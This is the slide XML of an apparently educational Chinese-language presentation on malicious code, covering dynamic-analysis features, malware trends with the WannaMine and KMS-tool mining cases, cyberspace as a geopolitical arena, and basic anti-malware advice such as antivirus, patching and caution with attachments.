            <a:off x="6214745" y="1822450"/>
            <a:ext cx="5447665" cy="2982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10435" y="259715"/>
            <a:ext cx="8755380" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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动态分析：行为特征</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="右大括号 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2953385" y="1779905"/>
            <a:ext cx="591185" cy="4359275"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 4922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flipH="1">
            <a:off x="3527425" y="1546225"/>
            <a:ext cx="2390140" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>主机流量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1409065" y="3683000"/>
            <a:ext cx="1520825" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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行为特征</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3568065" y="5837555"/>
            <a:ext cx="2130425" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>应用进程数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="右大括号 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5556250" y="2503170"/>
            <a:ext cx="716915" cy="25609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文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6402070" y="2353310"/>
            <a:ext cx="2190750" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>事件日志</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>文件操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>内存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>日志</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>网速</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>注册表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>启动文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="5560695"/>
            <a:ext cx="1478280" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>控制流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>数据流</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="右大括号 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5698490" y="5575300"/>
            <a:ext cx="499110" cy="9848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右大括号 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5711190" y="1426845"/>
            <a:ext cx="562610" cy="7340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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6402070" y="1437640"/>
            <a:ext cx="1478280" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>流量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>流量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346450" y="3594735"/>
            <a:ext cx="2080895" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>系统环境数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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9" grpId="1" animBg="1"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="30" grpId="1"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="31" grpId="1"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="35" grpId="1"/>
      <p:bldP spid="37" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="37" grpId="1" animBg="1"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="39" grpId="1"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="40" grpId="1"/>
      <p:bldP spid="41" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="41" grpId="1" animBg="1"/>
      <p:bldP spid="2" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="1" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="4" grpId="0"/>
      <p:bldP spid="4"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9420" y="2610485"/>
            <a:ext cx="10482580" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意代码发展态势</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混合病毒攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="1083310"/>
            <a:ext cx="9542780" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>现在很少有木马单打独斗，大部分都是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多毒种作战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下载者木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>体积小巧，不易被察觉，再由它下载其他木马到用户计算机。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>释放器木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>负责安装复杂木马，一旦运行了释放器木马就很难手动清除。 还有的木马选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和蠕虫病毒搭伙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>案例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“WannaMine”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过 NSA “永恒之蓝” 漏洞传播，配合蠕虫病毒来进行传播的挖矿木马。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“隐匿者”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>将“挖矿木马”植入了知名激活工具KMS，当用户下载安装此带毒工具后，挖矿木马也会入侵电脑，利用用户的电脑资源，为黑客“挖矿”赚钱。</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19275" y="708660"/>
            <a:ext cx="10172065" cy="5631180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络空间领域的斗争</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>已经是大国博弈和地缘安全中的常态化存在，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络空间更是政治、军事、经济等领域斗争的首发战场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>我国所面临的全球和地缘安全风险，既以大国竞合为主旋律，同时又围绕地缘安全热点展开，地缘利益竞合方众多，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多种矛盾复杂交织</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全威胁不是单纯的技术风险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，其风险和事件研判也不是单纯的领域内研判，这与攻击发起方和潜在对手的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>战略意图、技术能力和综合国力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>等综合因素息息相关。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>过去的安全威胁是单点威胁，例如病毒、木马、DNS攻击、网站篡改等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>如今随着信息技术越来越先进、信息体系越来越复杂、信息资产越来越庞大，安全威胁也在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不断发展演进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>我们对过去遭遇到的网络入侵攻击，往往将其作为单纯的网络安全事件看待，而未结合总体国家安全的多个方面进行综合分析，对对手意图的分析深度不足。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>未来，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>需要对网络攻击行为给我国政治安全、军事安全、科技安全等带来的综合影响后果全面加强研判</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，实现综合分析、全面量损、有效止损。</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网络安全发展趋势</a:t>
              </a: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9420" y="2610485"/>
            <a:ext cx="10482580" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意代码防护（反恶意代码）</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32990" y="1054100"/>
            <a:ext cx="8603615" cy="4407535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安装至少一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防病毒软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>定期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>升级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>你的防病毒软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不要随便打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>邮件附件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尽量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>减少授权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用你计算机的人</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>及时为系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安装最新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的安全补丁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从外部获取数据前先进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检查</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完整性检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
